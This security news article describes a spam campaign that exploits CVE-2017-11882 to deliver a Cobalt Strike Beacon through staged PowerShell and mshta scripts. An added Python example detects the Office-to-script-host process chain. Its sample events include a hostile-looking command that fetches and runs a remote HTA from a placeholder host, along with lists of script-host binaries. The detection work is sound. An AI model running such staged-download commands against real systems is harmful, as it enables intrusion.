Cobalt malware spotted in recent spam campaign

Cobalt malware was documented exploiting the 17-year-old vulnerability tracked as CVE-2017-11882 via spam, just a few days after researchers noted a similar spam campaign exploiting RTF documents.

Microsoft only recently patched the memory corruption vulnerability, which exists in its Office software because the program fails to properly handle objects in memory. The flaw could allow an attacker to run arbitrary code.

Shortly after the vulnerability was announced, threat actors weaponized the flaw to deliver malware that uses a component of the Cobalt Strike penetration testing tool, according to a Nov. 27 Fortinet blog post. The malware is spread via a spam campaign posing as a notification from Visa about rule changes to its payWave service in Russia, and is contained in a malicious RTF document attachment.

Researchers said the CVE-2017-11882 exploit leads to a Cobalt Strike Beacon, and that in this attack multiple stages of scripts are downloaded and executed before the main malware payload is reached. Once the exploit is triggered, an obfuscated JavaScript file is downloaded and executed using the Microsoft HTML Application Host.

“Once the document is opened, the user is presented with a plain document,” researchers said in the post. “However, in the background a PowerShell script is already being spawned that will eventually download a Cobalt Strike client to take control of the victim's system.”

The cybercriminals behind the attack were able to load Cobalt Strike's module without writing it to disk as a file, instead using trusted Microsoft Windows tools to run client-side scripts, an approach that traditional anti-virus products can overlook.
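The process chain the post describes (an Office document spawning PowerShell, with a script then run by the HTML Application Host) is exactly what endpoint telemetry can catch even when nothing is written to disk. Below is an added detection example, not code from the Fortinet post or from Cobalt Strike: it scans constructed Sysmon-style process-creation events for an Office parent launching a script host, or a script host fetching a remote resource. The process names, the event shape and the inclusion of the Equation Editor binary (eqnedt32.exe, the component CVE-2017-11882 affects) as an Office parent are assumptions of this example.

```python
"""Flag the Office -> script-host process chain described in the article.
Event fields (EventId, ParentImage, Image, CommandLine) mirror Sysmon's
process-creation event but are an assumed shape, not real telemetry."""
import re

# Parents that should rarely launch script interpreters directly.
# eqnedt32.exe (Equation Editor) is included as an assumption about the exploit host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Script hosts the described chain relies on (PowerShell, HTML Application Host).
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def suspicious_chain(event: dict) -> bool:
    """True when an Office parent starts a script host, or when a script host's
    command line pulls a remote resource (the staged download in the article)."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    office_to_script = parent in OFFICE_PARENTS and child in SCRIPT_HOSTS
    remote_fetch = child in SCRIPT_HOSTS and re.search(r"https?://", cmd) is not None
    return office_to_script or remote_fetch


def scan(events: list) -> list:
    """Return the EventIds of events that match the chain."""
    return [e["EventId"] for e in events if suspicious_chain(e)]


# Constructed sample events (not captured from a real system).
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c <constructed>"},
    {"EventId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/stage.hta"},
    {"EventId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "WINWORD.EXE /n invoice.rtf"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))  # [1, 2]
```

Event 3 (Explorer opening Word) is the benign baseline that the rule must not flag; tune OFFICE_PARENTS and SCRIPT_HOSTS to the binaries actually present in your estate.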

Users are urged to update their systems as soon as possible to avoid infection.